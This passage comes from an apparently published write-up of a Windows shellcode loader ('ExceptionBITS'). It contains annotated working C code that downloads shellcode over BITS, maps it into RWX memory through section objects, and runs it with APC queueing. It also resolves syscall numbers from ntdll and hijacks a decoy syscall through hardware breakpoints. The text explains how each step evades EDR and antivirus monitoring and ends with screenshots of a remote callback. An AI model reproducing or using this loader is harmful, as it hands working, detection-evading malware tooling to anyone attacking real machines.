
```c
BOOL FileMapInjectTampered(PBYTE pPayload, SIZE_T sPayloadSize, PVOID* ppAddress) {
    printf("[*] Using TAMPERED syscalls for file mapping injection\n");
    
    HANDLE hSection = NULL;
    PVOID pAddress = NULL;
    SIZE_T sViewSize = sPayloadSize;
    LARGE_INTEGER MaximumSize = { 0 };
    MaximumSize.QuadPart = (LONGLONG)sPayloadSize;
    
    // Create section using tampered syscall - ZwCreateSection
    printf("[*] Creating section with TAMPERED ZwCreateSection (Hash: 0x%0.8X)...\n", 
           g_ZwCreateSection_Hash);
    TAMPER_SYSCALL(g_ZwCreateSection_Hash, &hSection, SECTION_ALL_ACCESS, NULL, &MaximumSize, 
                   PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL, NULL, NULL, NULL, NULL);
    
    if (!hSection) {
        printf("[!] Failed to create section\n");
        return FALSE;
    }
    
    printf("[*] Section created successfully: 0x%p\n", hSection);
    
    // Map view using tampered syscall - ZwMapViewOfSection
    printf("[*] Mapping view with TAMPERED ZwMapViewOfSection (Hash: 0x%0.8X)...\n", 
           g_ZwMapViewOfSection_Hash);
    TAMPER_SYSCALL(g_ZwMapViewOfSection_Hash, hSection, (HANDLE)-1, &pAddress, NULL, NULL, NULL, 
                   &sViewSize, ViewUnmap, NULL, PAGE_EXECUTE_READWRITE, NULL);
    
    if (!pAddress) {
        printf("[!] Failed to map view of section\n");
        CloseHandle(hSection);
        return FALSE;
    }
    
    printf("[*] Allocated Address At: 0x%p Of Size: %lu\n", pAddress, (unsigned long)sViewSize);
    
    // Write payload
    memcpy(pAddress, pPayload, sPayloadSize);
    printf("[*] Payload copied from 0x%p to 0x%p\n", pPayload, pAddress);
    
    hFileMapping = hSection;
    *ppAddress = pAddress;
    
    printf("[*] Shellcode successfully mapped using TAMPERED syscalls\n");
    return TRUE;
}
```

{% endcode %}

* `PBYTE pPayload` is a pointer to the downloaded shellcode buffer, `SIZE_T sPayloadSize` is its size in bytes, and `PVOID* ppAddress` is an output parameter that will receive the address of the allocated memory.
* `LARGE_INTEGER MaximumSize` is a 64-bit integer structure used to specify sizes larger than 32 bits. `QuadPart` accesses it as a single 64-bit value.
* The `TAMPER_SYSCALL` macro invokes the syscall tampering mechanism. The first parameter is the hash of the target function (`ZwCreateSection`), followed by that function's parameters.
* For `ZwCreateSection`: `&hSection` (output handle), `SECTION_ALL_ACCESS` (0xF001F, all access rights), `NULL` (no object attributes), `&MaximumSize` (section size), `PAGE_EXECUTE_READWRITE` (0x40, RWX memory protection), `SEC_COMMIT` (0x8000000, commit physical storage), `NULL` (no file handle, so the section is backed by the paging file), then NULL padding for the remaining macro parameters.
* `(HANDLE)-1` is a pseudo-handle meaning "current process". It's the equivalent of `GetCurrentProcess()` but as a constant.
* For `ZwMapViewOfSection`: `hSection` (section handle), `(HANDLE)-1` (target process), `&pAddress` (output base address), `NULL` (zero bits—no specific address requirements), `NULL` (commit size), `NULL` (section offset), `&sViewSize` (view size), `ViewUnmap` (2, inheritance disposition), `NULL` (allocation type), `PAGE_EXECUTE_READWRITE` (protection), then NULL padding.
* `memcpy(pAddress, pPayload, sPayloadSize)` copies the shellcode bytes from the temporary buffer to the newly allocated executable memory.
* `hFileMapping = hSection` stores the section handle globally for later cleanup.
* `*ppAddress = pAddress` writes the allocated address to the output parameter, so the caller knows where the shellcode is.

Section objects are kernel objects that represent shared memory regions. Unlike `VirtualAlloc`, which directly allocates memory in a process, section objects are created in kernel space and then mapped into user space. This is more flexible and may also be less commonly monitored by EDR. Many security products focus on `VirtualAllocEx` or `NtAllocateVirtualMemory` for detecting malicious memory allocation, while `ZwCreateSection`/`ZwMapViewOfSection` is an alternative path that is often under-monitored.

Allocating with `PAGE_EXECUTE_READWRITE` immediately is a red flag in modern security analysis; most legitimate code allocates memory with `PAGE_READWRITE`, writes code to it, then changes protection to `PAGE_EXECUTE_READ`. However, since this loader is using syscall tampering, the actual Win32 API being monitored (`VirtualAllocEx`) is never called, so permission-based heuristics that watch API parameters are bypassed.

On the error path no view has been mapped, so `CloseHandle` simply releases the section. Once a view is mapped, the section stays alive for as long as the view exists, even if the handle is closed. The `ViewUnmap` parameter (value 2) specifies that child processes won't inherit this mapping, which is appropriate for shellcode injection.

#### **3.5 APC Queueing**

{% code overflow="wrap" %}

```c
// Download shellcode via BITS
static char tempBuffer[MAX_SHELLCODE_SIZE] = { 0 };
shellcode_size = DownloadShellcode(SHELLCODE_URL, tempBuffer, MAX_SHELLCODE_SIZE);
printf("[*] Downloaded shellcode size: %lu bytes\n", shellcode_size);

if (shellcode_size == 0) {
    printf("[!] DownloadShellcode returned zero\n");
    main_processing = FALSE;
    shellcode_executed = FALSE;
    return EXCEPTION_CONTINUE_EXECUTION;
}

// Use TAMPERED syscalls for file mapping
if (!FileMapInjectTampered((PBYTE)tempBuffer, shellcode_size, (PVOID*)&shellcode_buffer)) {
    printf("[!] FileMapInjectTampered failed\n");
    main_processing = FALSE;
    shellcode_executed = FALSE;
    return EXCEPTION_CONTINUE_EXECUTION;
}

// Queue APC using TAMPERED syscall - ZwQueueApcThread
printf("[*] Queuing APC using TAMPERED ZwQueueApcThread (Hash: 0x%0.8X)...\n", 
       g_ZwQueueApcThread_Hash);
TAMPER_SYSCALL(g_ZwQueueApcThread_Hash, GetCurrentThread(), (PVOID)shellcode_buffer, 
               NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL);

printf("[*] APC queued successfully\n");

// Mark as completed
shellcode_executed = TRUE;
main_processing = FALSE;

printf("[*] Returning to alertable wait in main()\n");
return EXCEPTION_CONTINUE_EXECUTION;
}
```

{% endcode %}

* `static char tempBuffer[MAX_SHELLCODE_SIZE]` declares a 4096-byte buffer with static storage duration. Although it is local to the function, it is not on the stack: it lives in the image's data section, persists across function calls, and is zero-initialized.
* `DownloadShellcode` is called with the URL, buffer, and maximum size. It returns the number of bytes actually read.
* If the download fails (`shellcode_size == 0`), the function resets the flags and returns `EXCEPTION_CONTINUE_EXECUTION`, which resumes execution after the `pDummy()` call in `main()`.
* `FileMapInjectTampered` allocates executable memory and copies the shellcode into it. On failure, the same error handling applies.
* For `ZwQueueApcThread`: `GetCurrentThread()` (target thread handle), `(PVOID)shellcode_buffer` (APC routine address, i.e. the shellcode entry point), then nine `NULL`s. The first three are the APC routine's arguments; the rest pad the argument list.
* `shellcode_executed = TRUE` and `main_processing = FALSE` update global state flags.
* `return EXCEPTION_CONTINUE_EXECUTION` tells Windows to resume execution. The CPU will return to the instruction after `pDummy()` in `main()`.

The APC (Asynchronous Procedure Call) mechanism is a Windows kernel feature that lets one context request that code be executed in another thread's context. APCs come in two types, user-mode and kernel-mode. This loader uses user-mode APCs, which run only when the target thread enters an alertable wait state.

The strength of this approach is that the shellcode runs in the context of the loader's own main thread, not a newly created one. Thread creation is one of the most monitored events in process security; EDR and AV products commonly track `CreateThread`, `CreateRemoteThread`, and `NtCreateThreadEx` calls. Queuing an APC on an existing thread avoids that thread-creation telemetry. The shellcode appears to execute spontaneously during a `SleepEx` call, which looks like a normal thread waiting for I/O. The NULL parameters to `ZwQueueApcThread` are placeholders, i.e. the function signature allows passing arguments to the APC routine, but shellcode typically doesn't expect any (it is position-independent and self-contained).

Returning `EXCEPTION_CONTINUE_EXECUTION` hands control back to `main()`: the exception was handled, the breakpoint is cleared, and execution continues normally. If the handler returned `EXCEPTION_CONTINUE_SEARCH` instead, Windows would look for other exception handlers, and the process could be terminated if none claimed the exception.

</details>

<details>

<summary>Syscall Tampering</summary>

#### **4.1 SSN Discovery Through Export Table Parsing**

{% code overflow="wrap" %}

```c
BOOL PopulateSyscallList() {
    if (gEntriesList.dwEntriesCount) {
        printf("[DEBUG] Syscall list already populated with %d entries\n", gEntriesList.dwEntriesCount);
        return TRUE;
    }
    
    printf("[DEBUG] Populating syscall list...\n");
    
    // Get handle to ntdll.dll
    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
    if (!hNtdll) {
        printf("[!] Failed to get ntdll.dll handle\n");
        return FALSE;
    }
    
    printf("[DEBUG] Found ntdll.dll at 0x%p\n", hNtdll);
    
    ULONG_PTR uNtdllBase = (ULONG_PTR)hNtdll;
    
    // Parse PE header
    PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)uNtdllBase;
    PIMAGE_NT_HEADERS pImgNtHdrs = (PIMAGE_NT_HEADERS)(uNtdllBase + pDosHeader->e_lfanew);
    
    if (pImgNtHdrs->Signature != IMAGE_NT_SIGNATURE) {
        printf("[!] Invalid PE signature\n");
        return FALSE;
    }
    
    // Get export directory (an RVA of 0 means there is no export table)
    DWORD dwExportRva = pImgNtHdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    if (!dwExportRva) {
        printf("[!] Failed to get export directory\n");
        return FALSE;
    }
    
    PIMAGE_EXPORT_DIRECTORY pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)(uNtdllBase + dwExportRva);
    
    PDWORD pdwFunctionNameArray = (PDWORD)(uNtdllBase + pExportDirectory->AddressOfNames);
    PDWORD pdwFunctionAddressArray = (PDWORD)(uNtdllBase + pExportDirectory->AddressOfFunctions);
    PWORD pwFunctionOrdinalArray = (PWORD)(uNtdllBase + pExportDirectory->AddressOfNameOrdinals);
    
    printf("[DEBUG] Export directory has %d functions\n", pExportDirectory->NumberOfNames);
    
    // Store Zw* syscalls
    for (DWORD i = 0; i < pExportDirectory->NumberOfNames; i++) {
        PCHAR pFunctionName = (PCHAR)(uNtdllBase + pdwFunctionNameArray[i]);
        
        // Check if function name starts with "Zw"
        if (*(unsigned short*)pFunctionName == 'wZ') {
            if (gEntriesList.dwEntriesCount < MAX_ENTRIES) {
                gEntriesList.Entries[gEntriesList.dwEntriesCount].u32Hash = HASH_STR(pFunctionName);
                gEntriesList.Entries[gEntriesList.dwEntriesCount].uAddress = 
                    (ULONG_PTR)(uNtdllBase + pdwFunctionAddressArray[pwFunctionOrdinalArray[i]]);
                gEntriesList.dwEntriesCount++;
            }
        }
    }
    
    printf("[DEBUG] Found %d Zw* functions before sorting\n", gEntriesList.dwEntriesCount);
    
    if (gEntriesList.dwEntriesCount == 0) {
        printf("[!] No Zw* functions found\n");
        return FALSE;
    }
    
    // Sort by address (bubble sort)
    for (DWORD i = 0; i < gEntriesList.dwEntriesCount - 1; i++) {
        for (DWORD j = 0; j < gEntriesList.dwEntriesCount - i - 1; j++) {
            if (gEntriesList.Entries[j].uAddress > gEntriesList.Entries[j + 1].uAddress) {
                SYSCALL_ENTRY TempEntry = {
                    .u32Hash = gEntriesList.Entries[j].u32Hash,
                    .uAddress = gEntriesList.Entries[j].uAddress
                };
                gEntriesList.Entries[j].u32Hash = gEntriesList.Entries[j + 1].u32Hash;
                gEntriesList.Entries[j].uAddress = gEntriesList.Entries[j + 1].uAddress;
                gEntriesList.Entries[j + 1].u32Hash = TempEntry.u32Hash;
                gEntriesList.Entries[j + 1].uAddress = TempEntry.uAddress;
            }
        }
    }
    
    printf("[DEBUG] Syscall list sorted successfully with %d entries\n", gEntriesList.dwEntriesCount);
    return TRUE;
}
```

{% endcode %}

* `GetModuleHandleA("ntdll.dll")` retrieves the base address of ntdll.dll, which is already loaded in every Windows process. This returns the HMODULE, which is actually the base address where the DLL is mapped.
* `PIMAGE_DOS_HEADER pDosHeader` points to the DOS header, which starts with the signature "MZ" (0x5A4D). Every PE file begins with this legacy DOS header.
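* `pDosHeader->e_lfanew` is the offset of the PE header (IMAGE\_NT\_HEADERS) from the start of the image. In ntdll.dll this is often 0xF0, but the value can differ between builds, which is why it is read from the header instead of being assumed.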
* `pImgNtHdrs->Signature != IMAGE_NT_SIGNATURE` verifies the PE signature is "PE\0\0" (0x00004550).
* `DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]` accesses the export directory entry (index 0) in the data directory array. This contains the RVA and size of the export table.
* `PIMAGE_EXPORT_DIRECTORY` points to a structure containing three important arrays: AddressOfNames (RVAs of function name strings), AddressOfFunctions (RVAs of function code), and AddressOfNameOrdinals (indices mapping names to addresses).
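* `*(unsigned short*)pFunctionName == 'wZ'` checks whether the first two characters are 'Z' and 'w' by reading them as one 16-bit integer. On little-endian x86/x64 the first character 'Z' (0x5A) lands in the low byte and 'w' (0x77) in the high byte, giving 0x775A. That is the value the compiler assigns to the multi-character constant `'wZ'`; such constants are implementation-defined, so the comparison depends on the compiler as well as the byte order.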
* `HASH_STR(pFunctionName)` computes the CRC32 hash of the function name.
* `uNtdllBase + pdwFunctionAddressArray[pwFunctionOrdinalArray[i]]` calculates the absolute address of the function. The ordinal array provides an index into the address array, and adding the base address converts the RVA to a virtual address.
* The bubble sort orders functions by address. This is intentional: on x64 Windows the syscall stubs are laid out in ntdll in SSN order, so a function's position in the address-sorted list corresponds to its SSN.
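The two-byte prefix test described above can be written without a multi-character constant or a pointer cast. The following is a minimal sketch, not the loader's code: `starts_with_zw` and `zw_as_little_endian` are hypothetical helper names, and the sample strings in the note below are only illustrations.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Returns 1 when `name` begins with the two bytes 'Z','w', 0 otherwise.
   memcpy is used instead of a pointer cast so the read is well-defined
   regardless of alignment. */
static int starts_with_zw(const char *name)
{
    assert(name != NULL);
    if (name[0] == '\0' || name[1] == '\0')
        return 0;                        /* shorter than two characters */

    uint16_t first_two;
    memcpy(&first_two, name, sizeof first_two);

    /* Build the expected value from the bytes as they sit in memory, so
       the comparison does not depend on the host byte order. */
    const unsigned char want_bytes[2] = { 'Z', 'w' };
    uint16_t want;
    memcpy(&want, want_bytes, sizeof want);

    return first_two == want;
}

/* The same two bytes interpreted explicitly as a little-endian integer:
   'Z' (0x5A) is the low byte, 'w' (0x77) is the high byte. */
static uint16_t zw_as_little_endian(void)
{
    return (uint16_t)('Z' | ('w' << 8));
}
```

With these helpers, `starts_with_zw("ZwClose")` is 1, `starts_with_zw("NtClose")` is 0, and `zw_as_little_endian()` is 0x775A, the value the original comparison relies on.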

This PE parsing manually walks ntdll's export table to enumerate all syscalls. ntdll.dll exports every syscall stub under two names, `Nt*` and `Zw*`. In user mode each pair resolves to the same stub address (the two prefixes only behave differently for kernel-mode callers, which is not relevant here), so filtering on the `Zw` prefix simply collects each stub exactly once. SSNs are not assigned alphabetically; the stubs are laid out in ntdll in ascending SSN order, which is why sorting by address recovers the numbering. On Windows 10 x64 builds, for example, `ZwAccessCheck` has SSN 0 and `ZwAcceptConnectPort` has SSN 2.

This ordering is consistent within a Windows build but changes between versions (e.g., Windows 10 vs. Windows 11). By discovering it at runtime, ExceptionBITS adapts to the installed Windows version without hardcoded SSNs. The limitation is that the technique only works for `Zw*` functions exported from ntdll; if a syscall isn't exported or is obfuscated, this won't find it. The bubble sort is inefficient (O(n²)), but with only \~400-500 Zw functions in ntdll, it completes in milliseconds. The use of RVAs (Relative Virtual Addresses) in PE files matters here: they are offsets from the base address, which lets the same DLL load at different addresses under ASLR without breaking references.
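The sort-by-address step can also be expressed with the standard library's `qsort`. This is a sketch under assumptions: `DemoEntry` is a hypothetical stand-in for the loader's `SYSCALL_ENTRY`, and the hashes and addresses used with it are made-up values, not real ntdll data.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

/* Hypothetical stand-in for the loader's SYSCALL_ENTRY. */
typedef struct {
    uint32_t  hash;     /* hash of the function name   */
    uintptr_t address;  /* address of the function stub */
} DemoEntry;

/* qsort comparator: ascending by address. The subtraction-free form
   avoids overflow when the addresses are far apart. */
static int compare_by_address(const void *lhs, const void *rhs)
{
    const DemoEntry *a = lhs;
    const DemoEntry *b = rhs;
    return (a->address > b->address) - (a->address < b->address);
}

/* Sorts the entries in place so that entries[i] is the i-th lowest stub. */
static void sort_entries_by_address(DemoEntry *entries, size_t count)
{
    assert(entries != NULL);
    qsort(entries, count, sizeof entries[0], compare_by_address);
}
```

After `sort_entries_by_address` returns, the array index of an entry is the value the loader treats as that function's SSN. For a few hundred entries the difference from the bubble sort is negligible; the main gain is less hand-written swapping code.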

#### **4.2 Fetching the System Service Number (SSN) by Hash**

```c
DWORD FetchSSNFromSyscallEntries(IN UINT32 uCRC32FunctionHash) {
    if (!PopulateSyscallList()) {
        printf("[!] Failed to populate syscall list\n");
        return 0x00;
    }
    for (DWORD i = 0; i < gEntriesList.dwEntriesCount; i++) {
        if (uCRC32FunctionHash == gEntriesList.Entries[i].u32Hash) {
            return i;
        }
    }
    printf("[!] SSN not found for hash 0x%0.8X\n", uCRC32FunctionHash);
    return 0x00;
}
```

This function is the bridge between the hash-based identification of syscalls and their actual SSN, which the kernel needs in order to dispatch the correct system call. By using hashes, the loader avoids storing or referencing sensitive function names directly, which makes static analysis and signature-based detection harder. Resolving SSNs dynamically keeps the loader working across Windows versions, as SSNs can change between builds. One caveat: the function returns `0x00` both on failure and for the entry at index 0, so the syscall with SSN 0 cannot be distinguished from "not found".
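A minimal sketch of the hash-then-lookup idea, with the success flag kept separate from the index so that index 0 stays usable. It assumes the hash is the standard reflected CRC-32 (polynomial 0xEDB88320); the source only says `HASH_STR` is a CRC32, so the exact variant is an assumption. `crc32_of` and `find_index_by_hash` are hypothetical names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Standard reflected CRC-32 (polynomial 0xEDB88320), computed bit by bit
   over a NUL-terminated string. Assumed variant, see the text above. */
static uint32_t crc32_of(const char *text)
{
    assert(text != NULL);
    uint32_t crc = 0xFFFFFFFFu;
    for (const unsigned char *p = (const unsigned char *)text; *p; p++) {
        crc ^= *p;
        for (int bit = 0; bit < 8; bit++)
            crc = (crc >> 1) ^ (0xEDB88320u & (0u - (crc & 1u)));
    }
    return ~crc;
}

/* Looks for `wanted` in a table of hashes that is already in sorted-stub
   order. Returns 1 and writes the position to *index_out when found;
   returns 0 and leaves *index_out untouched otherwise. */
static int find_index_by_hash(const uint32_t *sorted_hashes, size_t count,
                              uint32_t wanted, uint32_t *index_out)
{
    assert(sorted_hashes != NULL && index_out != NULL);
    for (size_t i = 0; i < count; i++) {
        if (sorted_hashes[i] == wanted) {
            *index_out = (uint32_t)i;
            return 1;
        }
    }
    return 0;
}
```

A caller checks the return value first and reads `*index_out` only on success, which removes the need to reserve any index as an error code.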

#### **4.3 Preparing the Tampered Syscall Hijack**

{% code overflow="wrap" %}

```c
BOOL InitializeTamperedSyscall(IN ULONG_PTR uCalledSyscallAddress, IN UINT32 uCRC32FunctionHash,
                               IN ULONG_PTR uParm1, IN ULONG_PTR uParm2, IN ULONG_PTR uParm3, IN ULONG_PTR uParm4) {
    // Find the syscall instruction (0x0F 0x05) in the decoy function
    PVOID pDecoySyscallInstructionAdd = NULL;
    for (int i = 0; i < 0x20; i++) {
        unsigned short opcode = *(unsigned short*)(uCalledSyscallAddress + i);
        if (opcode == 0x050F) { // 'syscall' opcode
            pDecoySyscallInstructionAdd = (PVOID)(uCalledSyscallAddress + i);
            break;
        }
    }
    if (!pDecoySyscallInstructionAdd) {
        printf("[!] Could not find syscall instruction in decoy function\n");
        return FALSE;
    }
    DWORD dwRealSyscallNumber = FetchSSNFromSyscallEntries(uCRC32FunctionHash);
    if (dwRealSyscallNumber == 0x00) {
        printf("[!] FetchSSNFromSyscallEntries returned 0 for hash 0x%0.8X\n", uCRC32FunctionHash);
        return FALSE;
    }
    PassParameters(uParm1, uParm2, uParm3, uParm4, dwRealSyscallNumber);
    if (!InstallHardwareBPHook(GetCurrentThreadId(), (ULONG_PTR)pDecoySyscallInstructionAdd)) {
        printf("[!] Failed to install hardware breakpoint\n");
        return FALSE;
    }
    return TRUE;
}
```

{% endcode %}

This function is the heart of the tampering mechanism. By setting a hardware breakpoint on the `syscall` instruction of a benign function (the decoy), the loader ensures that when the decoy is called, execution is intercepted just before the transition to kernel mode. This allows the loader to swap out the decoy's SSN and parameters for those of the real, sensitive syscall. Hardware breakpoints, unlike software breakpoints, do not modify code in memory, so checks that look for patched instructions (a common detection vector) find nothing, and most user-mode monitoring tools do not notice them.
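The opcode search at the top of the function is a plain two-byte pattern scan. A bounded, cast-free version might look like the sketch below; `find_syscall_opcode` is a hypothetical name, and any buffer passed to it in examples is made-up data, not a real stub.

```c
#include <assert.h>
#include <stddef.h>

/* Returns the offset of the first 0F 05 byte pair within the first
   `limit` bytes of `code`, or -1 when the pair does not occur.
   The loop condition `i + 1 < limit` keeps both reads inside the buffer. */
static long find_syscall_opcode(const unsigned char *code, size_t limit)
{
    assert(code != NULL);
    for (size_t i = 0; i + 1 < limit; i++) {
        if (code[i] == 0x0F && code[i + 1] == 0x05)
            return (long)i;
    }
    return -1;
}
```

Comparing the bytes individually gives the same result as the original `0x050F` comparison on little-endian hardware, without relying on an unaligned 16-bit read.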

#### **4.4 Passing Parameters for the Tampered Syscall**

{% code overflow="wrap" %}

```c
VOID PassParameters(IN ULONG_PTR uParm1, IN ULONG_PTR uParm2, IN ULONG_PTR uParm3, IN ULONG_PTR uParm4, IN DWORD dwSyscallNmbr) {
    EnterCriticalSection(&g_CriticalSection);
    g_TamperedSyscall.uParm1 = uParm1;
    g_TamperedSyscall.uParm2 = uParm2;
    g_TamperedSyscall.uParm3 = uParm3;
    g_TamperedSyscall.uParm4 = uParm4;
    g_TamperedSyscall.dwSyscallNmbr = dwSyscallNmbr;
    LeaveCriticalSection(&g_CriticalSection);
}
```

{% endcode %}

The critical section ensures that only one thread at a time writes the tampered syscall parameters, preventing torn or mixed values. Note that the lock covers only the store: it is released before the breakpoint fires, so two threads issuing tampered syscalls concurrently could still overwrite each other's parameters. This matters in complex loaders that operate in multi-threaded contexts or are injected into multi-threaded processes.

#### **4.5 Installing the Hardware Breakpoint**

{% code overflow="wrap" %}

```c
BOOL InstallHardwareBPHook(IN DWORD dwThreadID, IN ULONG_PTR uTargetFuncAddress) {
    CONTEXT Context = { .ContextFlags = CONTEXT_DEBUG_REGISTERS };
    HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, dwThreadID);
    if (!hThread) return FALSE;
    if (!GetThreadContext(hThread, &Context)) {
        CloseHandle(hThread);
        return FALSE;
    }
    Context.Dr0 = uTargetFuncAddress;
    Context.Dr6 = 0x00;
    Context.Dr7 = SetDr7Bits(Context.Dr7, 0x10, 0x02, 0x00); // RW0 = 00 (execute)
    Context.Dr7 = SetDr7Bits(Context.Dr7, 0x12, 0x02, 0x00); // LEN0 = 00 (1 byte)
    Context.Dr7 = SetDr7Bits(Context.Dr7, 0x00, 0x01, 0x01); // L0 = 1 (enable)
    if (!SetThreadContext(hThread, &Context)) {
        CloseHandle(hThread);
        return FALSE;
    }
    CloseHandle(hThread);
    return TRUE;
}
```

{% endcode %}

By setting RW0 to `00` (execute) and LEN0 to `00` (1 byte), the loader ensures the breakpoint only triggers on instruction execution at the exact address. Setting L0 to `1` enables the breakpoint for the current thread only, making it invisible to other threads and harder to detect.
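The DR7 updates are ordinary bit-field writes. The sketch below shows one way such a helper could be written; the loader's own `SetDr7Bits` is not shown in this section, so `set_bit_field` is a hypothetical equivalent with the same argument order (value, start bit, bit count, new field value). The bit positions follow the x86-64 DR7 layout: L0 at bit 0, RW0 at bits 16-17, LEN0 at bits 18-19.

```c
#include <assert.h>
#include <stdint.h>

/* Replaces `bit_count` bits of `value`, starting at `start_bit`, with the
   low bits of `field`. All other bits are preserved. */
static uint64_t set_bit_field(uint64_t value, unsigned start_bit,
                              unsigned bit_count, uint64_t field)
{
    assert(bit_count >= 1 && bit_count < 64 && start_bit + bit_count <= 64);
    uint64_t mask = ((UINT64_C(1) << bit_count) - 1) << start_bit;
    return (value & ~mask) | ((field << start_bit) & mask);
}

/* Applies the three writes from the text to a DR7 value:
   execute-type breakpoint, one byte long, locally enabled, in slot 0. */
static uint64_t dr7_for_execute_breakpoint_slot0(uint64_t dr7)
{
    dr7 = set_bit_field(dr7, 16, 2, 0);  /* RW0  = 00: break on execution */
    dr7 = set_bit_field(dr7, 18, 2, 0);  /* LEN0 = 00: one byte           */
    dr7 = set_bit_field(dr7, 0, 1, 1);   /* L0   = 1 : local enable       */
    return dr7;
}
```

Starting from a DR7 of 0, the result is 0x1: only L0 is set, and the RW0/LEN0 fields stay at zero. Because the helper masks before writing, settings for the other three breakpoint slots are left as they were.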

#### **4.6 Exception Handler for Tampered Syscall Execution**

{% code overflow="wrap" %}

```c
LONG ExceptionHandlerCallbackRoutine(IN PEXCEPTION_POINTERS pExceptionInfo) {
    BOOL bResolved = FALSE;
    if (pExceptionInfo->ExceptionRecord->ExceptionCode != STATUS_SINGLE_STEP)
        goto _EXIT_ROUTINE;
    if (pExceptionInfo->ExceptionRecord->ExceptionAddress != (PVOID)pExceptionInfo->ContextRecord->Dr0)
        goto _EXIT_ROUTINE;
    EnterCriticalSection(&g_CriticalSection);
    // Replace Decoy SSN and parameters with the real ones
    pExceptionInfo->ContextRecord->Rax = (DWORD64)g_TamperedSyscall.dwSyscallNmbr;
    pExceptionInfo->ContextRecord->R10 = (DWORD64)g_TamperedSyscall.uParm1;
    pExceptionInfo->ContextRecord->Rdx = (DWORD64)g_TamperedSyscall.uParm2;
    pExceptionInfo->ContextRecord->R8 = (DWORD64)g_TamperedSyscall.uParm3;
    pExceptionInfo->ContextRecord->R9 = (DWORD64)g_TamperedSyscall.uParm4;
    // Remove breakpoint
    pExceptionInfo->ContextRecord->Dr0 = 0ull;
    LeaveCriticalSection(&g_CriticalSection);
    bResolved = TRUE;
_EXIT_ROUTINE:
    return (bResolved ? EXCEPTION_CONTINUE_EXECUTION : EXCEPTION_CONTINUE_SEARCH);
}
```

{% endcode %}

The exception handler directly manipulates the saved register state, swapping the decoy values for the real ones just before the `syscall` instruction executes. It rewrites `RAX`, which carries the SSN, and the four register arguments `R10`, `RDX`, `R8`, and `R9`. The kernel therefore receives the real syscall and parameters, even though the user-mode code called a benign function. This bypasses user-mode hooks, IAT/EAT patching, and most EDR monitoring, as the actual syscall transition is never made through the monitored API.

</details>

***

## Results And Screenshots

#### Execution On Target System

<figure><img src="https://2429440930-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fvmiq90eCUf7ZZMUGm7Qu%2Fuploads%2FRcNn6HWVHSRg636nETDx%2FExecution%201.png?alt=media&#x26;token=9a3d674d-67a5-4e3a-a4e2-70d29ddafd04" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2429440930-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fvmiq90eCUf7ZZMUGm7Qu%2Fuploads%2FOfKH2RC5GWzrxUUUo571%2FExecution%202.png?alt=media&#x26;token=5f892c7d-348c-478d-906c-68e4673b41c4" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2429440930-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fvmiq90eCUf7ZZMUGm7Qu%2Fuploads%2FbW2Srd3uaiVp1OjyHGsL%2FExecution%203.png?alt=media&#x26;token=b33913c5-d495-466d-9b66-1ba57278eec9" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2429440930-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fvmiq90eCUf7ZZMUGm7Qu%2Fuploads%2FEerq91ei49Ybgo5sPlFW%2FExecution%204.png?alt=media&#x26;token=f081c9c4-d3b4-42a4-a7af-70b0a69f0605" alt=""><figcaption></figcaption></figure>

#### Callback To Remote Server

<figure><img src="https://2429440930-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fvmiq90eCUf7ZZMUGm7Qu%2Fuploads%2F1sOtf80Ux7cGe9Gfpv1r%2FServer%20Callback.png?alt=media&#x26;token=2d069c55-1c29-415c-9b90-89b7474df5a5" alt=""><figcaption></figcaption></figure>
